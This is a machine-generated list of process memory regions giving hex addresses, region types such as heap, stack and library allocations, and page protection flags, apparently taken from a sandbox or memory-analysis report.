8B1F000
stack
page read and write
8C20000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
7E15000
trusted library allocation
page read and write
4866000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
8AC0000
trusted library allocation
page read and write
1A051A13000
heap
page read and write
7D7F000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
B05F000
trusted library allocation
page read and write
2DE0000
heap
page read and write
8AD0000
trusted library allocation
page read and write
8CD0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
54AE000
trusted library allocation
page read and write
4AAD000
stack
page read and write
271A70A1000
heap
page read and write
8C70000
trusted library allocation
page read and write
8DD0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
7CC5000
unkown
page read and write
91B0000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6BB0000
trusted library allocation
page read and write
9DE3000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
1F65E477000
heap
page read and write
7C30000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
5E90000
direct allocation
page read and write
8E90000
trusted library allocation
page read and write
7EA0000
trusted library allocation
page read and write
3110000
trusted library allocation
page read and write
8C90000
trusted library allocation
page read and write
4F96000
direct allocation
page read and write
9CF0000
trusted library allocation
page read and write
8AF4000
direct allocation
page read and write
488D000
trusted library allocation
page execute and read and write
7F10000
unkown
page read and write
8E80000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
8C78000
unkown
page read and write
1FDF42C7000
heap
page read and write
7E80000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
8C80000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
8FE4000
trusted library allocation
page read and write
1A051B13000
heap
page read and write
8AA5000
trusted library allocation
page read and write
8E80000
trusted library allocation
page read and write
559A000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
8AC0000
trusted library allocation
page read and write
DA8000
heap
page read and write
4437000
stack
page read and write
2930000
trusted library allocation
page read and write
5584000
trusted library allocation
page read and write
54D2000
trusted library allocation
page read and write
26B63FD000
stack
page read and write
7EE0000
trusted library allocation
page read and write
271A80F0000
trusted library section
page readonly
4B10000
trusted library allocation
page read and write
1A051A79000
heap
page read and write
9010000
trusted library allocation
page read and write
A5A0C77000
stack
page read and write
7CC0000
unkown
page read and write
8CC0000
trusted library allocation
page read and write
52B0000
heap
page read and write
8C20000
trusted library allocation
page read and write
7E15000
trusted library allocation
page read and write
280F000
stack
page read and write
8EE0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
6D80000
trusted library allocation
page read and write
9E03000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
8A0000
heap
page read and write
9083000
trusted library allocation
page read and write
8C70000
unkown
page read and write
1F65E48A000
heap
page read and write
9CC0000
trusted library allocation
page read and write
2437CC76000
heap
page read and write
6B90000
direct allocation
page read and write
8F60000
trusted library allocation
page read and write
AFDE000
trusted library allocation
page read and write
1FDF4B00000
heap
page read and write
78B0000
trusted library allocation
page read and write
271A8490000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
242CDD2B000
heap
page read and write
8E90000
trusted library allocation
page read and write
AE69000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
5780000
heap
page read and write
D5E000
heap
page read and write
8CC0000
trusted library allocation
page read and write
877000
heap
page read and write
5773000
heap
page read and write
97A000
heap
page read and write
8AD0000
trusted library allocation
page read and write
271A6F60000
heap
page read and write
7E60000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
AF71000
trusted library allocation
page read and write
8DD0000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
AFEF000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
8C90000
trusted library allocation
page read and write
8A6000
heap
page read and write
7CC0000
unkown
page read and write
8C20000
trusted library allocation
page read and write
8C65000
trusted library allocation
page read and write
2437CC26000
heap
page read and write
8AC0000
trusted library allocation
page read and write
7E40000
trusted library section
page read and write
5DF0000
direct allocation
page read and write
8F00000
trusted library allocation
page read and write
6B96000
direct allocation
page read and write
6B30000
trusted library allocation
page read and write
9E21000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
190000
heap
page read and write
7ED0000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
9D00000
trusted library allocation
page read and write
7C70000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
8AA0000
trusted library allocation
page read and write
4F90000
heap
page read and write
6D70000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
50E6000
trusted library allocation
page read and write
6DD0000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
1A051A58000
heap
page read and write
5146000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
B122000
trusted library allocation
page read and write
7EF0000
unkown
page read and write
8E90000
trusted library allocation
page read and write
8AB7000
unkown
page read and write
1F65E500000
heap
page read and write
6B70000
trusted library allocation
page read and write
4A30000
heap
page read and write
7E80000
trusted library allocation
page read and write
6D26000
trusted library allocation
page read and write
9070000
trusted library allocation
page read and write
8EF000
heap
page read and write
7EE0000
trusted library allocation
page read and write
90F0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
CC42D0B000
stack
page read and write
8D70000
trusted library allocation
page read and write
ACC0000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
6C20000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
D95000
heap
page read and write
18199DE0000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
6F053000
unkown
page read and write
91A0000
trusted library allocation
page read and write
271A6FD0000
heap
page read and write
8EB0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8C80000
trusted library allocation
page read and write
8B3C000
direct allocation
page read and write
5779000
heap
page read and write
8F50000
trusted library allocation
page read and write
8D00000
unkown
page read and write
8AD0000
trusted library allocation
page read and write
4B00000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
9CC8000
trusted library allocation
page read and write
7BF4000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
6D80000
trusted library allocation
page read and write
50D4000
trusted library allocation
page read and write
2437CC83000
heap
page read and write
9200000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
1FDF428A000
heap
page read and write
8E95000
trusted library allocation
page read and write
20FB9213000
heap
page read and write
7EC0000
trusted library allocation
page read and write
1A051A80000
heap
page read and write
6F36000
trusted library allocation
page read and write
1F65E47D000
heap
page read and write
9CC0000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
91E0000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
8F00000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
1A051A25000
heap
page read and write
7EF0000
trusted library allocation
page read and write
271A7802000
heap
page read and write
CF8000
heap
page read and write
10007B000
stack
page read and write
20A95F13000
heap
page read and write
8C10000
trusted library allocation
page read and write
6F21000
trusted library allocation
page read and write
7EE8000
trusted library allocation
page read and write
1B09F1A0000
remote allocation
page read and write
8C40000
trusted library allocation
page read and write
44FD000
stack
page read and write
8EF0000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
9E08000
trusted library allocation
page read and write
9E6B000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
5E50000
direct allocation
page read and write
9CD0000
trusted library allocation
page read and write
2DE9000
heap
page read and write
8AB0000
unkown
page read and write
1B09EC40000
heap
page read and write
9C90000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
9CE5000
trusted library allocation
page read and write
8C90000
trusted library allocation
page read and write
7CC7000
unkown
page read and write
8E90000
trusted library allocation
page read and write
18199F02000
heap
page read and write
5470000
remote allocation
page read and write
5E36000
direct allocation
page read and write
1A0519F0000
trusted library allocation
page read and write
4863000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
8EA0000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
8AA0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
89F000
heap
page read and write
8E90000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page execute and read and write
B000000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
470E000
stack
page read and write
9210000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
1F65E3B0000
trusted library allocation
page read and write
A5A12FE000
stack
page read and write
4920000
trusted library allocation
page readonly
8AD5000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
9200000
trusted library allocation
page execute and read and write
9D20000
trusted library allocation
page read and write
8E90000
trusted library allocation
page execute and read and write
7EB0000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
B119000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
8E80000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
5452000
trusted library allocation
page read and write
1FDF4120000
heap
page read and write
8C65000
trusted library allocation
page read and write
9020000
trusted library allocation
page execute and read and write
9CC0000
trusted library allocation
page read and write
2437CD02000
heap
page read and write
6F70000
trusted library allocation
page read and write
9250000
unkown
page read and write
7E0F000
trusted library allocation
page read and write
570000
heap
page read and write
7260000
trusted library allocation
page read and write
6E20000
trusted library allocation
page read and write
5B31000
trusted library allocation
page read and write
B158000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
6BD0000
trusted library allocation
page read and write
2437CC7D000
heap
page read and write
9D30000
trusted library allocation
page read and write
20FB9302000
heap
page read and write
6B40000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
6C70000
trusted library allocation
page read and write
2437CC62000
heap
page read and write
9CB0000
trusted library allocation
page read and write
271AC760000
trusted library allocation
page read and write
9D20000
trusted library allocation
page read and write
9D40000
trusted library allocation
page read and write
7EC0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
AEBD000
trusted library allocation
page read and write
1B09EC56000
heap
page read and write
4FD0000
heap
page read and write
7CC0000
trusted library allocation
page read and write
5125000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
271A80D0000
trusted library section
page readonly
8C80000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
528A000
heap
page read and write
48A6000
trusted library allocation
page execute and read and write
8AD0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
1F65E240000
heap
page read and write
12BE09B000
stack
page read and write
8F15000
unkown
page read and write
940000
unkown
page readonly
271A6F70000
heap
page read and write
8DA0000
trusted library allocation
page read and write
6D23000
trusted library allocation
page read and write
2437CC64000
heap
page read and write
9CB0000
trusted library allocation
page read and write
90B2000
trusted library allocation
page read and write
8D70000
unkown
page read and write
8E80000
trusted library allocation
page read and write
7E67000
trusted library allocation
page read and write
2EFD000
stack
page read and write
1F65E513000
heap
page read and write
20FB9258000
heap
page read and write
6B60000
trusted library allocation
page read and write
CC432FF000
stack
page read and write
401000
unkown
page execute read
500000
heap
page read and write
8C20000
trusted library allocation
page read and write
50AC000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
9220000
trusted library allocation
page execute and read and write
91B0000
trusted library allocation
page read and write
91C0000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
6CE0000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
1F65E43C000
heap
page read and write
8EA0000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
8F20000
trusted library allocation
page read and write
50BF000
stack
page read and write
1FDF4313000
heap
page read and write
ADAC000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
91F5000
trusted library allocation
page read and write
510D000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
6F051000
unkown
page execute read
7C30000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
8F13000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
B1A4000
trusted library allocation
page read and write
8080000
trusted library allocation
page read and write
20FB8FD0000
heap
page read and write
8F00000
trusted library allocation
page read and write
960000
unkown
page read and write
523A000
heap
page read and write
8C60000
trusted library allocation
page read and write
6BB0000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
20FB9790000
trusted library allocation
page read and write
4AED000
stack
page read and write
8C40000
trusted library allocation
page read and write
AF38000
trusted library allocation
page read and write
8CA0000
trusted library allocation
page read and write
91F0000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
B10F000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
725C000
stack
page read and write
8C20000
trusted library allocation
page read and write
6F40000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
380000
remote allocation
page read and write
8C00000
trusted library allocation
page read and write
52D0000
trusted library allocation
page read and write
8FE0000
trusted library allocation
page read and write
1F65E44E000
heap
page read and write
5784000
heap
page read and write
940000
unkown
page readonly
8C66000
trusted library allocation
page read and write
271A8461000
trusted library allocation
page read and write
6B70000
trusted library allocation
page read and write
9040000
trusted library allocation
page read and write
8C97000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8FE5000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
7CC8000
trusted library allocation
page read and write
9C93000
trusted library allocation
page read and write
AFA8000
trusted library allocation
page read and write
6C30000
direct allocation
page read and write
8AC0000
trusted library allocation
page read and write
576D000
heap
page read and write
2940000
trusted library allocation
page read and write
8FF000
heap
page read and write
6DF0000
trusted library allocation
page read and write
8C80000
trusted library allocation
page read and write
7F9000
stack
page read and write
9000000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
909E000
trusted library allocation
page read and write
242CDB30000
heap
page read and write
7CC5000
trusted library allocation
page read and write
8AA0000
trusted library allocation
page read and write
271AC8A6000
heap
page read and write
8E95000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
7C60000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
9D00000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
5780000
heap
page read and write
48BB000
trusted library allocation
page execute and read and write
2437CC7A000
heap
page read and write
8CA0000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
4F0000
heap
page read and write
8AB0000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
8C40000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
8E95000
trusted library allocation
page read and write
1FDF4190000
heap
page read and write
8E60000
trusted library allocation
page read and write
1270000
heap
page read and write
9017000
trusted library allocation
page read and write
26B61FE000
stack
page read and write
B3F000
stack
page read and write
906E000
stack
page read and write
8C10000
trusted library allocation
page read and write
6E30000
trusted library allocation
page read and write
7DEF000
trusted library allocation
page read and write
900000
heap
page read and write
242CDF09000
heap
page read and write
8CB0000
trusted library allocation
page read and write
531F000
stack
page read and write
571C000
heap
page read and write
5459000
stack
page read and write
8D70000
trusted library allocation
page read and write
5E41000
direct allocation
page read and write
8E80000
trusted library allocation
page read and write
8AB0000
unkown
page read and write
8E90000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
7CC6000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
5784000
heap
page read and write
90AF000
trusted library allocation
page read and write
900000
heap
page read and write
8CA5000
trusted library allocation
page read and write
40A000
unkown
page write copy
8FE000
heap
page read and write
B0C9000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
8E96000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
8C76000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
18199E46000
heap
page read and write
B3C7000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
A5A147F000
stack
page read and write
8F90000
trusted library allocation
page read and write
8C20000
unkown
page read and write
4861000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
50CC000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
47EF4FE000
stack
page read and write
9C90000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
7CA0000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
4861000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
7F060000
trusted library allocation
page execute and read and write
91A0000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
2437CC40000
heap
page read and write
8C70000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
2FFB000
stack
page read and write
8C10000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
50EE000
trusted library allocation
page read and write
8ADE000
stack
page read and write
9E0C000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8B5E000
unkown
page read and write
8E96000
trusted library allocation
page read and write
5202000
trusted library allocation
page read and write
50A4000
trusted library allocation
page read and write
5105000
trusted library allocation
page read and write
6D70000
trusted library allocation
page read and write
54B6000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
533E000
stack
page read and write
4883000
trusted library allocation
page execute and read and write
6B92000
direct allocation
page read and write
9D50000
trusted library allocation
page read and write
8C00000
trusted library allocation
page read and write
4F00000
trusted library allocation
page read and write
7E90000
trusted library allocation
page read and write
8F60000
trusted library allocation
page read and write
8AE0000
trusted library allocation
page execute and read and write
4DBC000
stack
page read and write
9CC0000
trusted library allocation
page read and write
5720000
heap
page read and write
91E0000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
20FB9246000
heap
page read and write
9E59000
trusted library allocation
page read and write
271AC82D000
heap
page read and write
C30000
trusted library allocation
page read and write
A0B000
heap
page read and write
8C70000
unkown
page read and write
A3F000
stack
page read and write
9C90000
trusted library allocation
page read and write
6D20000
trusted library allocation
page read and write
8DB000
heap
page read and write
90B0000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
6B60000
trusted library section
page read and write
1343C7E000
stack
page read and write
9D80000
trusted library allocation
page read and write
950000
unkown
page readonly
9CF0000
trusted library allocation
page read and write
8C66000
trusted library allocation
page read and write
4F6E000
stack
page read and write
7DFF000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
A5A157A000
stack
page read and write
8E64000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
8C60000
unkown
page read and write
7C64000
trusted library allocation
page read and write
8D2000
heap
page read and write
9CC0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
B056000
trusted library allocation
page read and write
8DD0000
trusted library allocation
page read and write
4FF0000
direct allocation
page read and write
9D00000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8C5C000
trusted library allocation
page read and write
9180000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
6DE0000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
48B2000
trusted library allocation
page read and write
5B3000
heap
page read and write
8E70000
trusted library allocation
page read and write
8CB000
heap
page read and write
271AC8A3000
heap
page read and write
513E000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
242CDF10000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
8E00000
trusted library allocation
page read and write
6BB0000
direct allocation
page read and write
523D000
heap
page read and write
51FA000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
370A3FF000
stack
page read and write
53E0000
trusted library allocation
page read and write
8CA0000
trusted library allocation
page read and write
8C50000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8F97000
trusted library allocation
page read and write
1A0517B0000
heap
page read and write
7ED0000
trusted library allocation
page read and write
2437CC6A000
heap
page read and write
8ED0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
AE86000
trusted library allocation
page read and write
91B2000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
7C60000
trusted library allocation
page read and write
7C50000
trusted library allocation
page read and write
8D8D000
trusted library allocation
page read and write
5E70000
direct allocation
page read and write
7EC0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
8FC0000
trusted library allocation
page read and write
950000
unkown
page readonly
8CD0000
trusted library allocation
page read and write
8C50000
trusted library allocation
page execute and read and write
A1A000
heap
page read and write
6E00000
trusted library allocation
page read and write
B008000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
1A051A28000
heap
page read and write
7C50000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
B8F4DF9000
stack
page read and write
6E00000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
7CB0000
trusted library allocation
page read and write
571B000
heap
page read and write
9190000
trusted library allocation
page read and write
1F65E44F000
heap
page read and write
7EF0000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
12BEEFE000
stack
page read and write
A0B000
heap
page read and write
8C60000
unkown
page read and write
8D70000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
7E3D000
trusted library allocation
page read and write
9D10000
trusted library allocation
page read and write
271A7900000
heap
page read and write
8E10000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
5AA000
heap
page read and write
6BC0000
unkown
page execute and read and write
8C60000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
91C0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
9C93000
trusted library allocation
page read and write
271A7918000
heap
page read and write
8EC0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
4A40000
trusted library allocation
page read and write
3709FFB000
stack
page read and write
9D50000
trusted library allocation
page read and write
7EC0000
trusted library allocation
page read and write
6C50000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
271A7000000
heap
page read and write
7C08000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
7C60000
trusted library allocation
page execute and read and write
1B09E9B0000
heap
page read and write
8C20000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
6F70000
trusted library allocation
page read and write
12BEAFF000
stack
page read and write
91B0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
18199E6F000
heap
page read and write
6C62000
direct allocation
page read and write
7EF0000
trusted library allocation
page read and write
48B0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
18199E29000
heap
page read and write
8C69000
trusted library allocation
page read and write
9180000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
242CEB00000
unkown
page read and write
5030000
direct allocation
page read and write
9E07000
trusted library allocation
page read and write
B2BC000
trusted library allocation
page read and write
7C70000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
B8F4FFF000
unkown
page read and write
7ED0000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
6B50000
direct allocation
page read and write
8CA1000
trusted library allocation
page read and write
A50C000
stack
page read and write
4B2A000
heap
page read and write
7ED7000
trusted library allocation
page read and write
5382000
trusted library allocation
page read and write
1FDF42C3000
heap
page read and write
4F70000
heap
page read and write
8C50000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
506F000
direct allocation
page read and write
8AD0000
trusted library allocation
page read and write
7F10000
trusted library allocation
page read and write
5F30000
direct allocation
page read and write
B240000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
8E6000
heap
page read and write
2380000
heap
page read and write
8E90000
trusted library allocation
page read and write
8D75000
trusted library allocation
page read and write
1F65E402000
heap
page read and write
9CC0000
trusted library allocation
page read and write
D61000
heap
page read and write
8C65000
trusted library allocation
page read and write
8AC0000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
8CA0000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
8C65000
trusted library allocation
page read and write
52AA000
heap
page read and write
8F50000
trusted library allocation
page execute and read and write
8C50000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
9D30000
trusted library allocation
page read and write
400000
unkown
page readonly
8E48000
trusted library allocation
page read and write
571C000
heap
page read and write
19A000
stack
page read and write
8C60000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
8AC0000
trusted library allocation
page read and write
6E0000
remote allocation
page read and write
90F0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
571F000
heap
page read and write
6B40000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
5297000
heap
page read and write
A4CD000
stack
page read and write
5755000
heap
page read and write
526F000
heap
page read and write
9C90000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
8AA5000
unkown
page read and write
242CDCE7000
heap
page read and write
8C70000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
8AA0000
trusted library allocation
page read and write
8F80000
trusted library allocation
page read and write
5763000
heap
page read and write
8E40000
trusted library allocation
page read and write
574B000
heap
page read and write
9D80000
trusted library allocation
page read and write
940000
unkown
page readonly
78A0000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
271AC740000
trusted library allocation
page read and write
840000
trusted library allocation
page read and write
271A7740000
trusted library section
page read and write
271AC857000
heap
page read and write
8E40000
trusted library allocation
page read and write
514E000
stack
page read and write
4BAB000
stack
page read and write
7040000
trusted library allocation
page read and write
7D92000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
6BB0000
trusted library allocation
page read and write
1FDF4229000
heap
page read and write
271AC903000
heap
page read and write
8E90000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
89F000
heap
page read and write
4977000
heap
page read and write
CC434FE000
stack
page read and write
B3B8000
trusted library allocation
page read and write
525D000
stack
page read and write
7E59000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
8E30000
trusted library allocation
page read and write
8AD7000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
7EF0000
trusted library allocation
page read and write
8C90000
trusted library allocation
page read and write
A03000
heap
page read and write
8C50000
trusted library allocation
page read and write
1004FB000
stack
page read and write
8D70000
trusted library allocation
page read and write
8C75000
trusted library allocation
page read and write
7E6E000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
271A709F000
heap
page read and write
8ED0000
trusted library allocation
page read and write
8CF0000
unkown
page read and write
8E40000
trusted library allocation
page read and write
6E0000
remote allocation
page read and write
8E90000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
8C50000
trusted library allocation
page read and write
6F052000
unkown
page readonly
70A1000
heap
page read and write
8EA1000
trusted library allocation
page read and write
9E08000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
8C50000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
7EC0000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
1A051B02000
heap
page read and write
8EF000
heap
page read and write
271AC660000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
7DFC000
trusted library allocation
page read and write
7260000
trusted library allocation
page read and write
1343D7F000
stack
page read and write
8E60000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
8D70000
trusted library allocation
page read and write
8B70000
trusted library allocation
page read and write
9210000
trusted library allocation
page read and write
8F60000
trusted library allocation
page read and write
271AC674000
